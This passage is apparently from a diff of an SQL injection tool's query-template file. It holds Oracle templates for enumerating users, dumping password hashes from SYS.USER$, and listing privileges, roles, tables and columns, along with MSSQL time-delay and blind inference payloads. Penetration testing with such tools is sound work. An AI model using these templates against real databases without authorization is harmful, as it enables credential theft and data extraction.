||||
<blind query="SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS"/>
|
||||
</users>
|
||||
<passwords>
|
||||
<inband query="SELECT NAME, PASSWORD FROM SYS.USER$" condition="NAME"/>
|
||||
<blind query="SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$ WHERE NAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$ WHERE NAME='%s'"/>
|
||||
</passwords>
|
||||
<!--
|
||||
NOTE: in Oracle to enumerate the privileges for the session user you can use:
|
||||
SELECT * FROM SESSION_PRIVS
|
||||
-->
|
||||
<privileges>
|
||||
<inband query="SELECT GRANTEE, PRIVILEGE FROM DBA_SYS_PRIVS" query2="SELECT USERNAME, PRIVILEGE FROM USER_SYS_PRIVS" condition="GRANTEE" condition2="USERNAME"/>
|
||||
<blind query="SELECT DISTINCT(PRIVILEGE) FROM (SELECT DISTINCT(PRIVILEGE), ROWNUM AS LIMIT FROM DBA_SYS_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" query2="SELECT DISTINCT(PRIVILEGE) FROM (SELECT DISTINCT(PRIVILEGE), ROWNUM AS LIMIT FROM USER_SYS_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(PRIVILEGE)) FROM DBA_SYS_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(DISTINCT(PRIVILEGE)) FROM USER_SYS_PRIVS WHERE USERNAME='%s'"/>
|
||||
</privileges>
|
||||
<!--
|
||||
NOTE: in Oracle to enumerate the roles for the session user you can use:
|
||||
SELECT * FROM SESSION_ROLES
|
||||
-->
|
||||
<roles>
|
||||
<inband query="SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS" query2="SELECT USERNAME, GRANTED_ROLE FROM USER_ROLE_PRIVS" condition="GRANTEE" condition2="USERNAME"/>
|
||||
<blind query="SELECT DISTINCT(GRANTED_ROLE) FROM (SELECT DISTINCT(GRANTED_ROLE), ROWNUM AS LIMIT FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" query2="SELECT DISTINCT(GRANTED_ROLE) FROM (SELECT DISTINCT(GRANTED_ROLE), ROWNUM AS LIMIT FROM USER_ROLE_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM USER_ROLE_PRIVS WHERE USERNAME='%s'"/>
|
||||
</roles>
|
||||
<!-- NOTE: in Oracle there is no query to enumerate DBMS databases. It is possible only through a STATUS request to the Oracle TNS Listener negotiating its protocol -->
|
||||
<dbs/>
|
||||
<tables>
|
||||
<!-- NOTE: in Oracle the TABLESPACE_NAME is the spacename corresponding to SYS, SYSDBA, USERS. It is NOT the database name -->
|
||||
<inband query="SELECT TABLESPACE_NAME, TABLE_NAME FROM SYS.ALL_TABLES" condition="TABLESPACE_NAME"/>
|
||||
<blind query="SELECT TABLE_NAME FROM (SELECT TABLE_NAME, ROWNUM AS LIMIT FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'"/>
|
||||
</tables>
|
||||
<columns>
|
||||
<inband query="SELECT COLUMN_NAME, DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" condition="COLUMN_NAME"/>
|
||||
<blind query="SELECT COLUMN_NAME FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" query2="SELECT DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND COLUMN_NAME='%s'" count="SELECT COUNT(COLUMN_NAME) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" condition="COLUMN_NAME"/>
|
||||
</columns>
|
||||
<dump_table>
|
||||
<inband query="SELECT %s FROM %s"/>
|
||||
<blind query="SELECT %s FROM (SELECT %s, ROWNUM AS LIMIT FROM %s) WHERE LIMIT=%d" count="SELECT COUNT(*) FROM %s"/>
|
||||
</dump_table>
|
||||
<search_db/>
|
||||
<search_table>
|
||||
<!-- NOTE: in Oracle the TABLESPACE_NAME is the spacename corresponding to SYS, SYSDBA, USERS. It is NOT the database name -->
|
||||
<inband query="SELECT TABLESPACE_NAME, TABLE_NAME FROM SYS.ALL_TABLES WHERE " condition="TABLE_NAME" condition2="TABLESPACE_NAME"/>
|
||||
<blind query="SELECT DISTINCT(TABLESPACE_NAME) FROM SYS.ALL_TABLES WHERE " query2="SELECT TABLE_NAME FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'" count="SELECT COUNT(DISTINCT(TABLESPACE_NAME)) FROM SYS.ALL_TABLES WHERE " count2="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'" condition="TABLE_NAME" condition2="TABLESPACE_NAME"/>
|
||||
</search_table>
|
||||
<search_column>
|
||||
<inband query="SELECT TABLE_NAME FROM SYS.ALL_TAB_COLUMNS WHERE " condition="COLUMN_NAME"/>
|
||||
<blind query="" query2="SELECT DISTINCT(TABLE_NAME) FROM SYS.ALL_TAB_COLUMNS" count="" count2="SELECT COUNT(DISTINCT(TABLE_NAME)) FROM SYS.ALL_TAB_COLUMNS" condition="COLUMN_NAME"/>
|
||||
</search_column>
|
||||
</dbms>
|
||||
|
||||
<!-- SQLite -->
|
||||
<dbms value="SQLite">
|
||||
<!-- Not supported on SQLite 2 -->
|
||||
@@ -477,7 +473,6 @@
|
||||
<timedelay query="WAITFOR DELAY '0:0:%d'"/>
|
||||
<substring query="SUBSTRING((%s), %d, %d)"/>
|
||||
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
|
||||
<error query="%s %s=CONVERT(INT,(%s+(%s)+%s))"/>
|
||||
<inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
|
||||
<banner query="SELECT @@VERSION"/>
|
||||
<current_user query="SELECT SUSER_NAME()"/>
|
||||
|
||||
Reference in New Issue
Block a user